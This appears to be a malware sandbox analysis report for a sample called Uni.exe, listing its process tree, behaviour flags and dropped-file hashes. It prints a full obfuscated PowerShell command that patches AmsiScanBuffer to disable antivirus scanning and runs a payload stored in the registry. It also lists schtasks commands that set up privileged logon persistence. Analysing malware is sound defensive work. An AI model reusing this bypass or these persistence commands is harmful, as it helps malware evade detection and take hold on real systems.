C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:iClnMRoghVGC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aAglCGrraFiCPu,[Parameter(Position=1)][Type]$BahUwIjOZa)$zXgXzHzdDcg=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+'e'+''+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+'m'+[Char](111)+''+'r'+'y'+[Char](77)+'od'+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'e'+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+','+[Char](65)+'n'+[Char](115)+'iC'+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+'toC'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$zXgXzHzdDcg.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+'N'+''+[Char](97)+''+[Char](109)+''+'e'+''+[Char](44)+'Hi'+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+'g'+[Char](44)+'Pu'+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$aAglCGrraFiCPu).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e,Man'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$zXgXzHzdDcg.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+'k'+'e',''+'P'+''+'u'+'b'+'l'+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+'g'+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+'o'+[Char](116)+''+','+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l',$BahUwIjOZa,$aAglCGrraFiCPu).SetImplementationFlags(''+'R'+'unti'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $zXgXzHzdDcg.CreateType();}$bTLRhLRuWnVzI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+'t'+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+''+'i'+''+[Char](110)+''+'3'+''+'2'+'.U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+'ve'+[Char](77)+'eth'+[Char](111)+'ds');$oLpQJqSqaKhDLU=$bTLRhLRuWnVzI.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+'A'+''+[Char](100)+'dre'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+'i'+'c'+''+[Char](44)+''+'S'+'ta'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$CnqKHkKaEjPBDnboxfJ=iClnMRoghVGC @([String])([IntPtr]);$EubakbJwECtEDjVOwjkAAS=iClnMRoghVGC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZCkhRAIxogQ=$bTLRhLRuWnVzI.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'Ha'+'n'+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')));$kJrJQVJhOOwBrD=$oLpQJqSqaKhDLU.Invoke($Null,@([Object]$ZCkhRAIxogQ,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+'r'+''+'a'+''+[Char](114)+'y'+'A'+'')));$DXJHMbtgJopyetHDG=$oLpQJqSqaKhDLU.Invoke($Null,@([Object]$ZCkhRAIxogQ,[Object]('V'+'i'+''+[Char](114)+'tu'+[Char](97)+''+'l'+'P'+[Char](114)+'o'+'t'+'e'+[Char](99)+''+[Char](116)+'')));$HhpodMZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kJrJQVJhOOwBrD,$CnqKHkKaEjPBDnboxfJ).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+'l'+'');$mIOiWjGzSxsHIFBCe=$oLpQJqSqaKhDLU.Invoke($Null,@([Object]$HhpodMZ,[Object]('Ams'+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+'B'+''+'u'+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$jpuIdvQmWZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DXJHMbtgJopyetHDG,$EubakbJwECtEDjVOwjkAAS).Invoke($mIOiWjGzSxsHIFBCe,[uint32]8,4,[ref]$jpuIdvQmWZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$mIOiWjGzSxsHIFBCe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DXJHMbtgJopyetHDG,$EubakbJwECtEDjVOwjkAAS).Invoke($mIOiWjGzSxsHIFBCe,[uint32]8,0x20,[ref]$jpuIdvQmWZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue('$'+[Char](55)+''+[Char](55)+'s'+[Char](116)+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1000 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2752
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1228
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1236
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1244
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1312
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1428
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1448
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1460
-
c:\windows\system32\sihost.exesihost.exe2⤵PID:2840
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1516
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵PID:1592
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵PID:1636
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1660
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵PID:1740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1788
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1796
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1892
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1908
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1376
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:2076
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2204
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2268
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2456
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2464
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2692
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
- Drops file in System32 directory
PID:2704
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2736
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2760
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2768
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:2860
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3024
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵PID:3092
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3436 -
C:\Users\Admin\AppData\Local\Temp\Uni.exe"C:\Users\Admin\AppData\Local\Temp\Uni.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:4648
-
-
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:4516
-
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
PID:3660
-
-
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
PID:4608
-
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:1812
-
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3948
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4112
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:4948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Modifies data under HKEY_USERS
PID:4868
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:424
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3452
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:4844
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1160
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵PID:2836
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵PID:2448
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:960
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵PID:3896
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:2776
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
409KB
MD57417c8c73e614f293152575f46134216
SHA1cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
SHA25600c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
SHA512897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize338B
MD516581547ab79fb83a82d9b1fd6ebbe25
SHA160b3147772e256876a3ed75cef21b5a8cf85a438
SHA256cc5a3f5146f9d7a9502df4758b459c5de81a0d158b44c33cd64a4305a13fbaf9
SHA5126f0d0fb77591df3d2a7c1749d9630e885b23a34b1a367952262d254d3ea4c749814a5e0058c45185829ba7e58356b5cb21a03ead7cce9f1f3121c266071f391e
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
Filesize412B
MD552ba05284c509a6d3ffbaad68e7ab70c
SHA1ad48e87b91a9d2b45388bf120d62c13a9198e9e8
SHA256bfa99f27c7a189bfe553664384a5cc2d8e162e2ebfd569c4f61419addd5bcc14
SHA512d9db208deb3d4c3aebf0c087249f1398800fbb1324f05742505d5f7e091696862065fa58d540cd1e69d9a2e9f6f6acc4612a0112bd6a2944badcd37f2a4941fc
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5efe0903424c927d3611f8d8acd078b79
SHA122fda4e644f8fa0908493f40b930b1dff1755356
SHA25679fc6c6c41514007fa27978e5313312789718489126594f603a4a325153114d6
SHA5128de645327a416095eae442471a8b4f0b27c60dd424545ebb9f9708a412b6f7d0635ef3069e1663db3dd2bfe5882040c25a1af10d12a2eed4bf8340fd401f8de9